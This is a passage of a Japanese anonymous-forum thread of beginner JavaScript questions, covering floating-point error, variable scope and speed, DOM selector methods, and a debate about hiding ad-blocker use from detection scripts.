130 :
2017/01/30(月) 21:32:58.62 ID:???
>>122
> この2つの方法で結果に違いはありますか?

ないよ。たとえイベントリスナを
じっていたとしてもない。

おそらくinnerHTMLを空にしたほうが速いだろう。

だが

「tbodyに追加したtrを削除」という文章をそのままコードに書き下した
$('tbody > tr').remove() が一番可読性が高い
131 :
Name_Not_Found
2017/01/30(月) 22:49:42.55 ID:VseG2LWP
>>126
132 :
2017/01/30(月) 22:50:25.49 ID:???
>>131
荒らしやめてください
133 :
2017/01/30(月) 23:01:51.46 ID:???
>>126,132
荒らし止めてね
134 :
2017/01/30(月) 23:12:43.26 ID:???
>>133
荒らすなよクズ
135 :
2017/01/30(月) 23:27:32.98 ID:???
JavaScriptやる人ってここまでレベル低いんだね
136 :
2017/01/30(月) 23:38:05.76 ID:???
JamaScriptやってるんだろうな
137 :
2017/01/30(月) 23:39:36.29 ID:???
荒らしは>>130だろとマジレス
138 :
2017/01/30(月) 23:40:46.54 ID:???
>>130は有益な内容だから問題ない
139 :
2017/01/30(月) 23:48:58.54 ID:???
>>130はごく普通のjQuery信者
140 :
2017/01/31(火) 01:09:26.80 ID:???
普通でないjQuery信者って何だろう?
141 :
2017/01/31(火) 01:29:01.12 ID:???
jquery信仰を他者に押し付けない謙虚な信者
142 :
2017/01/31(火) 02:06:39.95 ID:???
有益な内容だから問題ない
143 :
2017/01/31(火) 02:14:05.56 ID:???
「偏った評論家」と予めバイアスをかけとけば平和かもな
144 :
2017/01/31(火) 03:10:34.87 ID:???
自分で有益とか言ってて虚しくないのか
145 :
2017/01/31(火) 04:57:47.02 ID:???
>>117
コンピューターの小数点には誤差があるから、正確な値が必要なときは、整数だけを使うこと。
見た目が0.1と表示されていても、実際の値は、0.1じゃない

>Math.round((0.1+0.2)*10)/10
0.1+0.2は、見た目は0.3だが、実際の値は、誤差があるから0.3にはならない

詳しくは、浮動小数点で検索して
146 :
115
2017/01/31(火) 11:42:51.80 ID:EfDZjAHK
>>117
> ちなみに Math.round((0.1+0.2)*10)/10 でも大丈夫ですか?
0.1+0.2 は浮動小数点演算なので結果は保証されません。
誤差が Math.round で吸収できる範囲におさまるかどうかは仕様を読み込まないと分からないので、必要であれば「IEEE754-2008」を解読して下さい。私もそこまで詳しくは知りません。
https://www.csee.umbc.edu/~tsimo1/CMSC455/IEEE-754-2008.pdf
私からいえるのは整数に変換してから演算すれば、扱える整数の最大値(9007199254740991)を超えない限りは誤差がなくなるという事です。
二項演算の和算であれば自動化するのは簡単なので関数化しておけばいいでしょう。
147 :
2017/01/31(火) 12:12:08.48 ID:???
誤差だとか結果は保証されないとか、馬鹿げた言い回しは辞めてほしいね、ほんと
148 :
2017/01/31(火) 13:12:32.65 ID:???
>>145-146を否定するなら「更に良い回答」を自分からすべきだと思う
149 :
Name_Not_Found
2017/01/31(火) 13:16:40.06 ID:RUJB/bUO
しるかバーカ
150 :
2017/01/31(火) 13:54:23.18 ID:???
おい、お前らさあ
JamaScript の質問用スレッドでやってくれよ
151 :
2017/01/31(火) 14:30:58.13 ID:???
無駄な煽りこそ消えてほしいよ
152 :
2017/01/31(火) 14:57:15.97 ID:???
153 :
2017/01/31(火) 18:51:39.54 ID:???
154 :
2017/01/31(火) 19:06:13.88 ID:???
ドメインがもう臭い
155 :
2017/02/01(水) 00:34:10.72 ID:???
1,024は、2**10乗だよな
Math.log2(1024); // 10

MDNにあるポリフィル
Math.log2 = Math.log2 || function(x) {
return Math.log(x) / Math.LN2;
};

このポリフィルでは、分母のMath.LN2は、約0.693〜で誤差があるから、
所々で間違った値を返す

だから、計算に浮動小数点を使ったら、正確な値を返さない
156 :
2017/02/01(水) 02:07:47.92 ID:???
そもそもMath関数の精度事態が保証されていないがな
V8も直近のネイティブ実装になる前はその実装だったし
157 :
2017/02/02(木) 14:32:41.83 ID:???
誤差ではなく有効数字の問題
無理数なんだからどうあがいても誤差は出る
158 :
Name_Not_Found
2017/02/02(木) 18:24:38.01 ID:URN1C2px
初歩的なことかもしれませんが、、

<script>
var start = new Date().getTime();
for (var i = 0; i < 10000000; i++) {}
var end = new Date().getTime();
console.log((end-start) + " ms");
</script>

これだと実行時間が大体25〜30msくらいで、

<script>
var start = new Date().getTime();
addEventListener('DOMContentLoaded', function(){
for (var i = 0; i < 10000000; i++) {}
var end = new Date().getTime();
console.log((end-start) + " ms");
});
</script>

こっちだと14〜20msくらいなんですが、この違いはなぜでしょうか?
159 :
2017/02/02(木) 19:03:51.71 ID:???
わからん
何かしら最適化されている気がする
160 :
2017/02/02(木) 19:37:08.56 ID:???
>>158
前後のHTMLが不明ですね
DOMのリフロー処理が並列して走るから干渉して遅くなっているのでは?
161 :
2017/02/02(木) 19:39:56.04 ID:???
>>160
そのscript要素だけでhtml作って試してみ
162 :
Name_Not_Found
2017/02/02(木) 20:02:29.48 ID:buSUxCye
javascriptって例えばカウントダウンタイマーの作り方を覚えたとして、その後何度かカウントダウンタイマーを作って慣れていくのが正しいんですか?簡単に言うとJAVAscriptで作れるものを一つ一つ覚えていくということです(ここではカウントダウンタイマー)

それともオブジェクト、メソッド、プロパティを覚えてカウントダウンタイマーの作り方を知らない人が考え抜いてカウントダウンタイマーを作るのが正しいんですか?

自分で知らないものを1から作るなんてめちゃくちゃ難しいので一つ一つ覚えていくというやり方でいいのでしょうか?
163 :
2017/02/02(木) 20:25:20.60 ID:???
>>162
まずは何をしたいかを明確にすることが大事
例えば料理だと、作りたいものが無いと食材も調理器具も何を揃えていいのかもわからないだろ。それと同じ

とりあえずwebの場合、DOM操作以外でjsを使う場面はまず無い

タイマーやゲームなど動きのあるものを作りたいなら他の言語を使ったほうが良い
164 :
Name_Not_Found
2017/02/02(木) 20:58:24.99 ID:buSUxCye
ありがとうございます
165 :
2017/02/02(木) 21:18:43.68 ID:???
>>158
ローカル変数使ってるからだろ


オメェら役に立たねぇなぁw
166 :
2017/02/02(木) 21:25:05.06 ID:???
>>165
ローカル変数使うだけでそこまで早くなんのかよwwww
じゃあこれでどやwwwドヤァwwwwww

<script>
(function () {
var start = new Date().getTime();
for (var i = 0; i < 10000000; i++) {}
var end = new Date().getTime();
console.log((end-start) + " ms");
})();
</script>

早くなりましたすいません。
167 :
2017/02/02(木) 21:36:08.40 ID:???
無知なわたくしめに説明してください
168 :
2017/02/02(木) 21:41:36.82 ID:???
jQueryでもlodashの話題でもないからめんどくせぇなぁw
169 :
2017/02/02(木) 21:46:44.12 ID:???
>>167
js ローカル変数 早い とかで検索してみては
http://d.hatena.ne.jp/maachang/20130211/1360569777
内部的に総当りで探してるようなもんと思えば大体合ってるわ

なんでこんな初歩的なこと知らなかったんだろう?
と思ったらそもそもグローバル変数なんて使わないじゃん
170 :
2017/02/02(木) 21:47:55.75 ID:???
>>167
まあいいや。説明してやろう。
こういうことだよ

function a() {
 var i;
 function b() {
  var j;
  function c() {
   var k;
   function e() {
    var l;
    l = 1; // l はどこにあるんだ? 関数eの中にあった!
    i = 1; // i はどこにあるんだ? 関数eの中にない! cの中にない! bの中にない! aの中にあった!
   }
  }
 }
}
171 :
2017/02/03(金) 00:15:05.07 ID:???
それは間違い、CPUキャッシュやレジスタ周りの最適化の影響
172 :
2017/02/03(金) 06:54:12.77 ID:???
つまり単純にローカル変数 == 早いではなく
javascriptを動かしてるエンジンによって変わってくるってことか?
173 :
2017/02/03(金) 08:34:35.21 ID:???
>>162
学習用途でカウントダウンタイマーを作る事は否定しない
カウントダウンタイマーの派生系だけでなくて他の課題にも挑戦した方が良いとは思うが

> 自分で知らないものを1から作るなんてめちゃくちゃ難しいので
最終的にはそのやり方で出来るようにならなければならない
作りたいものに必要な技術を知らなくて調べる事から始める事なんてざらにあるからね
ただ、全くの無知識で始めるととっかかりすらないだろうからある程度の下積みは必要
174 :
2017/02/03(金) 09:05:23.97 ID:???
>>172
理屈ではそうなるだろうけど、現実的にはエンジン自体に差はほとんど無いと思う
175 :
2017/02/03(金) 11:39:08.06 ID:???
毎回処理時間が同じだとは限らない
176 :
2017/02/03(金) 20:03:39.24 ID:???
Javascript学習3日目です
ページのテキスト表示を外部のjsファイルから操作して空白にしろと言われました
表示はphpファイルでやってるみたいです
正直phpもhtmlもよくわかってないレベルです
何か参考になる書籍やサイトがあれば教えていただきたいです
177 :
2017/02/03(金) 20:15:47.10 ID:???
んなもん先生だか先輩だか上司だかに聞け
178 :
2017/02/03(金) 21:58:09.46 ID:???
innerHTMLとかでぐぐればok
179 :
2017/02/03(金) 22:26:37.62 ID:???
3日でマスター HTML5 & CSS3、鳥羽薫、2013

この本が一番簡単。
30ほどのHTML5・CSS3の主要タグが学べる
180 :
2017/02/03(金) 22:33:57.71 ID:???
三日坊主の間違いだろw
181 :
2017/02/03(金) 22:52:46.49 ID:???
三日坊主笑った
いいセンスしてるわ
182 :
2017/02/03(金) 22:53:19.74 ID:???
>>179
jsスレらしい宣伝だ
183 :
2017/02/04(土) 17:09:45.99 ID:???
ブックマークレットを実行するとそのサイトの運営者にどんなコードが実行されたかってわかっちゃいます?
184 :
2017/02/04(土) 17:11:40.74 ID:???
いいえ
185 :
2017/02/04(土) 18:14:56.34 ID:???
ありがとうございました
186 :
2017/02/05(日) 21:25:52.88 ID:???
実はごにょごにょすれば分かることもある
けどそんなことしてる運営者なんていないだろうし気にしないでいいよ
187 :
2017/02/06(月) 04:58:41.55 ID:???
ごにょごにょしてもわからない
188 :
2017/02/07(火) 16:03:31.34 ID:???
JavaScriptでAES暗号化するなら何がオススメですか?
189 :
2017/02/07(火) 16:57:08.91 ID:???
CryptoAPIがあんじゃん
190 :
2017/02/07(火) 17:26:48.04 ID:???
>>189
使ってみたいので詳しくたのみます。
191 :
2017/02/07(火) 17:32:24.32 ID:???
192 :
2017/02/08(水) 08:31:55.58 ID:???
getElementsByClassNameとquerySelectorAllってどうやって使い分ければいいんですか?
193 :
2017/02/08(水) 09:41:09.24 ID:???
>>192
getElementsByClassName('クラス名称')
querySelectorAll('CSSのセレクタ')
194 :
2017/02/08(水) 11:15:14.66 ID:???
>>192
live か not live か
195 :
2017/02/08(水) 22:16:32.27 ID:???
>>192
君の本当の質問は使い分けというより、
querySelectorAllを使えば、getElementsByClassNameはいらないはずなのに
なんでgetElementsByClassNameなんてのが存在しているの? という質問だろうね。

話は簡単で昔はquerySelectorAllがなかったから
もともとgetElementsByClassNameとかはCSS自体がない(もしくは
あったかもしれないが実用レベルではない)時代に作られたものだから
querySelectorAllなんて生まれるはずもなかったんだよね。

そのあとセレクタでDOM要素を取得するというjQueryが登場し、
そのアイデアをパクってできたのがquerySelectorAll

だから機能的に言えばgetElementsByClassNameは使う必要はない
使う理由があるとしたらquerySelectorAllがないブラウザにも対応させるときか
getElementsByClassNameの方が速いかもしれない(測定してないがほぼ0だろう)
ぐらいかな
196 :
2017/02/08(水) 22:44:25.13 ID:???
速度だけでしか物事を測れない人って薄っぺらいな
197 :
2017/02/08(水) 22:55:07.45 ID:???
querySelectorAllなんて最遅だろ
ノードリストが出来上がるまで待ってるんだから
198 :
2017/02/08(水) 23:03:58.53 ID:???
>>196
読んでないのがバレバレw
199 :
2017/02/08(水) 23:04:59.65 ID:???
>>197
getElementsByClassNameで取得できる状態であれば
querySelectorAllでも取得できる
200 :
2017/02/08(水) 23:08:16.90 ID:???
すぐ上で答え出てるのになんでこんなトンチンカンな妄想言えるんだろうな

getElementsByClassNameはリアルタイムに反映される参照を返すから一度取得すればいつまでも使い回せる
querySelectorAllはただヒットしたノードのリストを返すからDOM更新の度に再取得する必要がある
根本的に別物なんだよ
201 :
2017/02/08(水) 23:17:36.01 ID:???
多分、仕様を読んだことがないから意味が分からんかったのだろ
202 :
2017/02/08(水) 23:32:59.07 ID:???
querySelectorAllを使う理由は諸々のデメリットを度外視して
楽だから以外にない
203 :
2017/02/08(水) 23:43:45.81 ID:???
>>197
CSSって最悪なのか?w
204 :
2017/02/09(木) 00:24:29.18 ID:???
getElementsByClassNameと比較して「楽だから」とかアホか
205 :
2017/02/09(木) 03:03:44.49 ID:???
そもそもどっちも使わない
206 :
2017/02/09(木) 03:56:44.72 ID:???
どっちも使わないなら無理に話題に参加しない方がいい
207 :
2017/02/09(木) 04:26:00.39 ID:???
無知を馬鹿にされて恥かいたからって八つ当たりしてんなよ
208 :
2017/02/09(木) 07:57:57.46 ID:???
どっちも使わないjQuery信者も大変だな
209 :
2017/02/09(木) 08:05:23.62 ID:???
www
210 :
2017/02/09(木) 09:31:49.13 ID:???
え・・・?他にjQueryしかないと思ってる・・・?
211 :
Name_Not_Found
2017/02/09(木) 11:51:47.53 ID:qiL8PH0C
質問です
setIntervalでマウス座標を取得したいのですが
eventを使わずにマウス座標を取得する方法はありますか?
212 :
2017/02/09(木) 19:51:57.43 ID:???
>>211
ない
213 :
2017/02/11(土) 14:15:05.73 ID:???
アクセスアップとお小遣い稼ぎの裏技
トラフィックエクスチェンジ
http://tra-chan.jugem.jp/?eid=1
214 :
2017/02/14(火) 14:49:09.18 ID:???
一昔前だとJSで<button>を.click()した時でもマウス座標取得できたなあ
それでウィンドウ外のマウス座標も分かった
今は無理っぽいけど
215 :
2017/02/14(火) 15:02:37.99 ID:???
そもそも、eventで事足りるからね
>>211は設計をこねくり回して変な実装しようとしているように見える
216 :
2017/02/14(火) 16:12:45.22 ID:???
>>211
企画イベントの成功を祈る
217 :
2017/02/16(木) 20:37:35.48 ID:???
jsボックス内の背景色をグラデーションにするやり方がわかりませんわ

cssの以下をjsで処理するにはどんな書式になりますか?
background: linear-gradient(90deg,#000,#fff,);
218 :
2017/02/16(木) 21:20:09.87 ID:???
普通に代入すればいいですわ
document.getElementById("hoge").style.background = "linear-gradient(90deg,#000,#fff)";
219 :
2017/02/16(木) 21:35:05.86 ID:???
帰宅したら試してみます。
ありがとうございます。
220 :
2017/02/17(金) 16:52:20.76 ID:???
中々家に帰れなくて連絡おくれて申し訳ない。
教えて頂いた書式で上手く動作しました。
ありがとうございました。
221 :
2017/02/17(金) 22:08:11.68 ID:???
中川家?
222 :
2017/02/18(土) 18:36:29.86 ID:???
掃除当番表を作っています
それでcssを生成する処理でわからないことがありました

宣言あり
for(i=0;i<指定回数;i++){処理内容};

宣言なし
for(var i=0;i<指定回数;i++){処理内容};

var無しでも動くのですがどちらが正しいですか?
ちなみに自分は小5の初心者です
223 :
2017/02/18(土) 19:08:02.72 ID:???
>>222
どちらも正しいが、Strict Modeでは前者はエラーとなり、後者が推奨される
ちなみにプログラミングに年齢は関係ない
224 :
2017/02/18(土) 19:22:44.29 ID:???
strict modeもあるけど、var書かないと他のループの変数と衝突しかねないから、varは書いた方がいいだろうな
俺も小5の頃にvar書かなかったためにバグで悩んだ記憶がある
225 :
2017/02/18(土) 19:25:29.85 ID:???
俺も小5の頃にクロージャ使いまくってメモリ圧迫してたわ
226 :
2017/02/18(土) 20:01:48.51 ID:???
俺は中2の頃からやってるが、そんな記憶はない
227 :
2017/02/18(土) 20:18:58.28 ID:???
グローバル変数って使う?
228 :
2017/02/18(土) 22:43:34.17 ID:???
対抗意識を燃やした時点で敗者だというのにw
229 :
2017/02/18(土) 23:32:43.30 ID:???
>>227
使わない
230 :
2017/02/19(日) 04:52:02.30 ID:???
>>228
皆ただ実体験を共有してるだけなのにそれを対抗だと認識している痛い敗者は君だけだよ
231 :
2017/02/19(日) 06:25:21.73 ID:???
反応するな同類になるぞ
232 :
2017/02/19(日) 06:31:33.64 ID:???
さすがに釣られすぎなんだよなあ
233 :
2017/02/19(日) 06:39:33.86 ID:???
ネタとして楽しんでるだけじゃね?
234 :
2017/02/19(日) 06:56:26.61 ID:???
スルー出来なかった時点で負け
235 :
2017/02/19(日) 10:33:41.35 ID:???
勝ち負けを自分の価値観で決めつけてるところが子供だよなあ…。
236 :
2017/02/19(日) 11:36:47.83 ID:???
by触ることを我慢できなかった子供
237 :
2017/02/19(日) 11:44:01.91 ID:???
2ch初心者って感じで見てて微笑ましい

>>227
使わない
DOM要素は常にグローバルで宣言されてるようなもんだから、使わないと一貫性をもたせたほうが良い
中途半端に使うとややこしくなる。というかなった

ブラゲとかは知らん
238 :
2017/02/19(日) 17:55:40.92 ID:???
222です
アドバイス助かりました!
for文内にvarをつけることにします
239 :
2017/02/20(月) 21:10:40.31 ID:???
閲覧者がadblockとかの広告ブロックを利用しているかどうかの判定ってできない?
240 :
2017/02/20(月) 22:15:32.04 ID:???
何処かで見たけど
div 1
div ad
div 2
この時、1と2topを調べればそれなりにわかる

ちなみに1%もないので、はっきり言って調べるだけ時間の無駄
abpを広めるサイトでも作ってるならもう少し考えてあげるけど
241 :
2017/02/20(月) 22:37:01.50 ID:???
adblockを使ってることをさとられない方法ってあるかな?
昔そういう機能(自分の中でステルス機能って読んでいたw)を
考えた見たことはある。

例えばadblock使用しているとき特有ののオブジェクトの
存在チェックをされないように名前をユーザーが変更できるとか

広告を消すのではなく、無害なものに置き換えることで
広告の存在チェックを騙すとか

考えては見たけど、adblockチェックをしているような所でも
そのチェックコードのJavaScriptを弾くようにすれば
adblockチェック自体を無効化出来てそれで十分なので
今のところそこまでやる必要性がない
242 :
2017/02/20(月) 23:04:24.35 ID:???
adblockを使ってることをさとられない方法ってあるかな?
今のところそこまでやる必要性がない

〜 完 〜
243 :
2017/02/20(月) 23:14:49.90 ID:???
>>242
ん?何が言いたいのかな?

やる必要性はなくても
やれる力をつけておくことは重要だよ
244 :
2017/02/20(月) 23:18:50.52 ID:???
完璧な方法はないでしょ
いたちごっこだよ
コンピュータウィルスとセキュリティソフトの関係と同じ
245 :
2017/02/20(月) 23:22:44.99 ID:???
>243
adblockを避ける理由がいまいち分からないし、どんな方法であれ避ける方法を避ける方法が開発される
sで、その避ける方法も避ける方法が開発される
phpならまだしもjsだどうしようもない
そこまで頑張る広告なら努力賞として踏んであげたら?

で、
「今のところそこまでやる必要性がない」
にたどり着く
だいたい広告があることでそこまで不便になることもないだろう
むしろそこまでして避けたい理由の方が知りたい
246 :
2017/02/20(月) 23:24:22.17 ID:???
> むしろそこまでして避けたい理由の方が知りたい

ステルス機能の実現だけど?
どこまでクライアント側で書き換えてることを
検出できないようにできるかという話
247 :
2017/02/21(火) 00:33:33.03 ID:???
adblockを使わずに広告を殺せばいい
248 :
2017/02/21(火) 01:54:09.66 ID:???
adb入れてると「adbを無効にして更新してください」って画面全体に出すサイト、ほんとひで。
IE専用サイトと同じぐらいムカつく。
お前のサイトにそこまでする価値はねぇよと言いたい
249 :
2017/02/21(火) 03:59:21.54 ID:???
スクリプト版使えば出ない
250 :
2017/02/21(火) 10:28:51.10 ID:???
>>246
何の為にステルス機能を実現するの?
251 :
2017/02/21(火) 11:04:05.39 ID:???
自分もだけどどうしても対策したい人は追加のUSなり作ってするでしょ。
でもそれをADB標準で入れちゃうといたちごっこが加速するだけだから、
どうしてもな人だけで良いと思うよ
252 :
2017/02/21(火) 12:20:03.70 ID:???
>>250
どこまで隠蔽できるかの技術調査
253 :
2017/02/21(火) 12:28:22.56 ID:???
広告の位置にposition: absoluteで白いdivを重ねたらバレにくいんじゃね
254 :
2017/02/21(火) 12:49:01.98 ID:???
>>252
隠蔽する方法が分かれば発見する事も可能となるので、いたちごっこになるのは避けられない
「どこそこのURLのadblock判定を回避するにはどうすればいいですか」のように具体的になっているならともかく、ただ漠然と「adblockを使っている事を悟られないようにするには」といわれてもね
あえていうなら「方法さえわかれば発見できるので100%不可能」
255 :
2017/02/21(火) 12:56:56.55 ID:???
>>254
たとえばさ、特殊なブラウザを作って、
広告画像の部分を透明画像に置き換えるってことは可能でしょ?
サイト側は表示しているつもりなのに、実際には透明で表示されてる
こんなのは検出不可能でしょ?

ポップアップウインドウでもJavaScriptからは正常に表示している
実際に動いている。ウインドウがそこにある。
だけどユーザーからみれば透明。これも可能だよね?
256 :
2017/02/21(火) 13:19:11.42 ID:???
ぼくのかんがえたさいきょうのブラウザ
257 :
2017/02/21(火) 13:30:41.87 ID:???
>>255
> 広告画像の部分を透明画像に置き換えるってことは可能でしょ?
画像が置き換えられれば、URLも実サイズも変わるのだから検出可能

> だけどユーザーからみれば透明。これも可能だよね?
どうやって透明にしているのア知らんが、CSSでやってるのだろうからJavaScriptで検出可能
258 :
2017/02/21(火) 14:00:34.50 ID:???
255は、広告は表示しないけど広告を表示させているようにJSが嘘をつくブラウザを作ればいいって言ってるんでしょ。
まあこんな暴論が成り立つならテキストブラウザでも使っとけって言いたいがな
259 :
2017/02/21(火) 14:03:17.57 ID:???
透明化だけでいいならユーザースタイルでopacity指定するだけのことじゃん
adblockだって必要に応じて要素指定するんだから手間は変わらん
260 :
2017/02/21(火) 14:24:47.65 ID:???
>>257
JavaScriptで検出する時にニセの値を返すようにするって方法があるだろ?
261 :
2017/02/21(火) 14:28:28.76 ID:???
>>257
> 画像が置き換えられれば、URLも実サイズも変わるのだから検出可能
URLは間にプロキシを挟むことで同じURLのまま違う画像を返したことはあるよ
その延長で同じサイズの透明画像を返すこともできるだろう
262 :
2017/02/21(火) 14:29:23.10 ID:???
ComputedStyleを読み取ればopacityも判定可能
>>258のいうようにJavaScriptエンジンを自作すれば、判定不可能にはなるな
実DOMと外向きのDOMが異なる動作にすると致命的なバグを引き起こしそうで怖いが、やる気があるならやってみたらいいんじゃないかね
263 :
2017/02/21(火) 14:31:10.15 ID:???
>>260
では、ComputedStyleをどうやって誤魔化すのかいってみろ
264 :
2017/02/21(火) 14:35:42.51 ID:???
window.getComputedStyle = function() {いろいろ}

こんな感じでできるだろw
265 :
2017/02/21(火) 14:37:57.65 ID:???
>>261
それはもうadblockのブラウザ拡張の範囲を超えているんじゃないかね
(>255の特殊なブラウザも荒唐無稽な話ではあるが…、本当に技術力を持っているなら聞くまでもなくやっているだろうに)
Local Proxyを使って書き換えれば確かにあなたのいう挙動は実現できる
ならば、canvasを使って対象の画像を読み込めば透明色を判定できるのでは?
266 :
2017/02/21(火) 14:40:29.57 ID:???
>>264
君の知識はその程度か
window を得る方法はいくらでもある

グローバルコードの this
document.defaultView
Function('return this')();
(0,eval)('this')
267 :
2017/02/21(火) 14:41:23.75 ID:???
>>265
突き詰めればブラウザのレンダリング部分を置き換えることになるだろうね。

ヘッドレスブラウザが実際には画面には何も描画していないのと同じように
JavaScriptからは描画しているつもりだけど何も表示されない。

究極的にはアンチ広告専用のブラウザを作ることには
なるだろうとは思ってるよ。
268 :
2017/02/21(火) 14:42:19.96 ID:???
>>226
いやw
本物のwindowオブジェクトのメソッドを置き換えてるんだから
本物のwindowオブジェクトの取得方法を変えても意味ないってw
269 :
2017/02/21(火) 14:45:08.11 ID:???
>266は間違えだった
DOMParserやiframeを使って新しいwindowを作成すれば正規のgetComputedStyleを参照できるな
270 :
2017/02/21(火) 14:47:13.72 ID:???
>>267
完全にスレ違いだからブラウザ開発スレでも作ってそっちでやってくれ
271 :
2017/02/21(火) 14:48:45.83 ID:???
>>269
DOMParserやiframeを使って新しいwindowを作成する
関数も置き換えることになりそうだな
272 :
2017/02/21(火) 14:50:37.45 ID:???
>>271
何をどう書き換えるのか具体的にいってみろ
273 :
2017/02/21(火) 14:52:35.29 ID:???
https://developer.mozilla.org/ja/docs/Web/API/MutationObserver
> MutationObserver とは、指定したコールバック関数を DOM の変更時に
> 実行させる API です。この API は、DOM3 Events の仕様で定義されていた
> Mutation Events を新しく設計し直したものです。

これとかもステルス機能に利用できないかなーって思ってるよ。
274 :
2017/02/21(火) 14:54:06.25 ID:???
>>272
新しくwindowを作成する関数を置き換えて
windowを作成した後に動的にパッチを当てるとかね。

こういうのってウイルスとかプロテクト関連の
技術でよく使われるよ
275 :
2017/02/21(火) 15:27:55.03 ID:???
では、予め書き換え不可能なようにしておけば防止できるな
276 :
2017/02/21(火) 15:40:15.39 ID:???
「ぼくのかんがえたさいきょうのステルス機能」はもういい
自分で考えた仕組みがあるなら質問する前に実践してから悩め
せめて、実物を作ってコードを見せてから質問しろよ
「机上の空論」は時間の無駄
277 :
2017/02/21(火) 15:51:09.99 ID:???
>>276
どうしたの?
278 :
2017/02/21(火) 16:12:08.62 ID:???
>>275
どうやって?
279 :
2017/02/21(火) 16:20:30.10 ID:???
>>278
Object.defineProperty
280 :
2017/02/21(火) 16:21:12.08 ID:???
>>277
何が?
281 :
2017/02/21(火) 17:26:15.39 ID:???
window生成の方法は他にもいくつかあるわけで全てのAPIを監視してwindow生成する度に書き換えるのは現実的じゃない
そもそも、getComputedStyleを変数にキャッシュされていたらどうしようもない
MutationObserverを使えば広告が書き換えられたことも監視できる
282 :
2017/02/21(火) 20:12:51.18 ID:???
ではそのMutationObserverそのものを先に置き換えればいいな
283 :
2017/02/21(火) 20:13:44.67 ID:???
>>279
Object.definePropertyを置き換えればいいな
284 :
2017/02/21(火) 20:14:09.56 ID:???
> window生成の方法は他にもいくつかあるわけで全てのAPIを監視してwindow生成する度に書き換えるのは現実的じゃない

十分現実的
285 :
2017/02/21(火) 22:01:51.41 ID:???
jsの話題からそれた輩がおるな
286 :
2017/02/21(火) 22:15:43.93 ID:???
>>283
Object.definePropertyを書き換え不可能にされたら終わりだろ
変数に関数をキャッシュされても終わり
今までの指摘でその発想に至らないようでは君には無理じゃないかね
287 :
2017/02/22(水) 01:07:31.56 ID:???
> Object.definePropertyを書き換え不可能にされたら終わりだろ

どうやって書き換え不可能にするの?

書き換え不可能にする前に先手を打つって話をしてるのに
288 :
2017/02/22(水) 01:08:21.65 ID:???
> 変数に関数をキャッシュされても終わり

変数にパッチ当て済みの関数を
キャッシュしちゃうわけですねw
289 :
2017/02/22(水) 07:51:39.13 ID:???
全てのサイトであらゆるメソッドを完璧に監視できるんなら確かに可能でしょ。
でもそれは現実的に無理。
それよりはネイティブでNN使ってレンダリングツリー食わせて学習させんだと言う方がまだ見込みがある。

広告が嫌と言っても、コンテンツと無関係で派手な広告が気に食わないだけだろうからで、
自作のブロッカー書いて自分が回るサイト内でadbとは別軸で簡単に適応させてしていくのが最も現実的だよ。
完全対策は不可能だけど、そもそも広告が嫌と言っても画像や音声や映像などで
コンテンツと融合したものはかなり困難だしね。
290 :
2017/02/22(水) 07:54:01.89 ID:???
あんまり堂々といたちごっこを加速すべきじゃない。
お互いが大変になっていくだけだからね。
例えばnew Realmを使った駆け引きとか、難しくなると思うけどなぁ。
291 :
2017/02/22(水) 07:58:34.78 ID:???
abp使うなってサイトでは素直に切るかな
abpモドキを作って回避することはできるけど、労力が大きすぎんよ〜
292 :
2017/02/22(水) 08:35:35.45 ID:???
まあオーバーレイタイプであればもどきを作らなくても
要素を検証→Delキー で大体の場合終了だわな
ページ遷移タイプは超簡単なUSで対応可能
293 :
2017/02/22(水) 10:24:43.12 ID:???
すいません、既に動作している他サイトのjavascriptへの対策についての質問は大丈夫でしょうか。
ブラウザで該当サイト閲覧時、強制スクロールが発生してしまうのですが
この部分のjavascriptだけをピンポイントで無効にする方法はないのでしょうか。
294 :
2017/02/22(水) 11:57:19.02 ID:???
物による
関数単位で簡単に無効にすれば済むような設計なら話は早いが
295 :
2017/02/22(水) 12:22:36.63 ID:???
あまりにうざいのは出てからブックマークレットで消してるわ。
広告屋で学生時代バイトした経験から言うと、広告を見たくないから広告が手元にこないようにする、ってのは最悪手。
広告屋は収益が無くなるので、意地でも手元に広告を届けるようになる&単価の高い広告になる。多分ネットだとそれが≒エロ、グレーゾーンなんだと思う。

届いた事にするのが一番エスカレートしない。
そうしとかないと星新一の賑やかな未来になってしまうと思ってたけど、なりつつあるのが末恐ろしい。
296 :
2017/02/22(水) 18:41:22.16 ID:???
クリックしてもらわんと金にならんのだが
297 :
2017/02/22(水) 19:22:42.85 ID:???
>>296
そうなって居ない時代もあったのよ。枠に値段つけて、時間やビュー割合で売るやつ。
そうしてるうちに、枠の転売する奴が出て来たり、素人が自分で適当な中身のないサイトにベタベタ貼って、事実上枠の価値をゼロに近づけた。
だから、枠では無くて、有効枠数という意味でのクリック率で金取ってたけど、それでも枠の価値が下がりすぎてらもう率では計上出来なくなって、
クリック数で金とった。
そしたら、自分のページに貼り付けて、自分で色んなプロキシ使って踏み倒したり、リファラ攻撃でとにかくクリックさせるようにした。
もうクリック数も無意味な数字になったので、有効クリック数という意味で、アフィリエイトって形が始まった。
それも自爆やら収益率やらなんやらという形で死んで、今は大手サイトが自社で金使ってコンテンツ作って、財源に広告費をあて、その枠を売るという形で元に戻ったが、その代わりに絶対に見せるという方法で広告枠を死守するようになった。

CMカットの方法が良くなったり、配信形態が増えるにつれて、テレビCMが長くなったのと同じ。
全部そんな負の連鎖。
しかも何周かしてる。俺は1周目終わりぐらいまでしか居なかったけど、残ってる人に聞いたらやっぱそう。
298 :
2017/02/22(水) 19:26:23.44 ID:???
でもやっぱ消すよなw
299 :
2017/02/22(水) 19:35:51.27 ID:???
まぁ、ぶっちゃけ俺もdisplay:noneかける。
300 :
2017/02/23(木) 00:24:23.68 ID:???
星新一じゃないじゃん!

要は広告そのものが死ねばいいのに
301 :
2017/02/23(木) 00:33:16.95 ID:???
そうだね。
全部有料コンテンツのサイトになれば、広告もなくなって解決だね。
302 :
2017/02/23(木) 00:38:46.68 ID:???
>>300
ごめん、筒井康隆だったw
広告が死んだら普通の人は今考える常識的な値段で物買えなくなるよ。
ただで見れないどころか。
広告は適切なものが適切な形で出れば悪いもんじゃないと思ってるけどな。
YouTubeの広告とか飛ばせるのにたまに見ちゃうじゃん。ああいうの。
303 :
2017/02/23(木) 00:57:05.91 ID:???
>>301
> 全部有料コンテンツのサイトになれば、広告もなくなって解決だね。
そうあるべきなんだよね。
本当に価値があるものに金を払うべき

>>302
> YouTubeの広告とか飛ばせるのにたまに見ちゃうじゃん。ああいうの。
いや、俺飛ばしてるけど

最近はYouTubeの下とかに出る広告も消してるし。
FlashじゃなくてHTML5になったお陰で消しやすくなった



